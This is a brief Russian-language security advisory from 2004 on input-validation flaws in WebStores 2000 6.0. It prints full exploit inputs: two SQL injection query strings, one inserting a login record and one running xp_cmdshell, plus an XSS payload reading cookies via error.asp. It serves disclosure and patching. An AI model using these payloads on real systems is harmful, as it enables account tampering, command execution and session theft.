Множественные уязвимости в WebStores 2000
| Дата публикации: | 23.02.2004 |
| Всего просмотров: | 1584 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Webstores 2000 6.x |
| Уязвимые версии: Webstores 2000 6.0
Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в WebStores 2000. Удаленный пользователь может внедрить SQL команды и выполнить произвольные команды операционной системы на целевой системе. Удаленный пользователь может выполнить XSS нападение. 1. SQL инъекция в 'browse_item_details.asp': Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25% 27+AND+Store_Items.Sh ow+%3C%3E+0+AND+Store_Item_Ke yword.Store_id%3D1000+and+Store_Items.Store_id% 3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_ d_1_name%2C+ Store_Items.U_d_2_name%2CStore_Items.U_d_3_name %2CStore_Items.U_d_4_name% 2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+ Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Item s.Item_Weight% 2C+Store_Items.Q uantity_in_stock%2C+Store_Items.Quantity_Control_Number% 2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.S pecial_start_date%2C+ Store_Items.Special_end_date+ORDER+BY+Count% 28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%2 8Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Sear ch_Store.x=0&Search_Store.y=0и Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_ SKU=%25% 27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id% 3D1000+and+Store_Items.Store_id% 3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1 _name%2C+ Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name% 2C+Store_Item_Keyword.Item_Id%2CSt ore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store _Items.Retail_Price% 2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Q uantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Pr ice_special_Discount%2C+Store_Items.Special_start_date% 2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Ite m_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+% 2 7dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=41. XSS: http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script> URL производителя:http://www.webcortex.com/site2000/products.asp Решение:Установите обновленную версию программы. |
|
| Ссылки: | WebCortex Webstores2000 version 6.0 multiple security vulnerabilities |